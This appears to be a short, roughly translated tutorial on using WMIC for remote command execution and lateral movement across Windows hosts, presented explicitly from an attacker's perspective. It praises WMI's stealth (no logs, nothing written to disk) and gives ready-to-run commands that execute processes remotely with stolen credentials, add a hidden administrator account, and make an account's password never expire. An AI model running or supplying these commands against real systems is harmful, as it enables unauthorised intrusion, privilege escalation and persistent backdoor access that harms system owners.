Prerequisite:

1. The remote server starts the windows management instrumentation service, opens the tcp135 port, and the firewall releases the traffic on this port (by default)

2. The “network access: sharing and security mode of local accounts” of the local security policy of the remote server should be set to “classic – local users authenticate themselves”

3. Know the account and password of the remote server or host

wmic /node:”192.168.1.20″ /user:”domain\administrator” /password:”123456″

###Wmic
the full name of WMI is windows management instrumentation, which appears in all windows operating systems, and is composed of a set of powerful tools to manage local or remote Windows systems. Attackers use WMI to attack, but windows can not By default, the system will not record these operations in the log, so there is no log, and the attack script does not need to be written to disk, which increases the concealment. Wmic is recommended for remote command execution.

Common commands
execute bat script on remote system

wmic/node:192.168.17.138 /user :test /password:!@#123QWE process call create c:\programdata\ test.bat

Executing a single command on a remote system

wmic/node:192.168.17.138 /user :test /password:!@#123QWE process call create ” cmd.exe /c net user test1 !@#123QWE /add && net localgroup administrators test1 /add

Tool description
1. The remote system needs to start the windows management instrumentation service and open port 135
2. The “network access: sharing and security mode of local accounts” of the local security policy of the remote system should be set to “classic – local users authenticate with their own identity”
3. Wmic The command will be executed on the remote system with administrator authority
4. If the firewall is opened, it will not be able to connect
5. If the error “invalid global switch” is reported, the node containing – can be executed normally with double quotation marks.

Wmic set password never expired

wmic useraccount where name=”administrator” set passwordexpires=false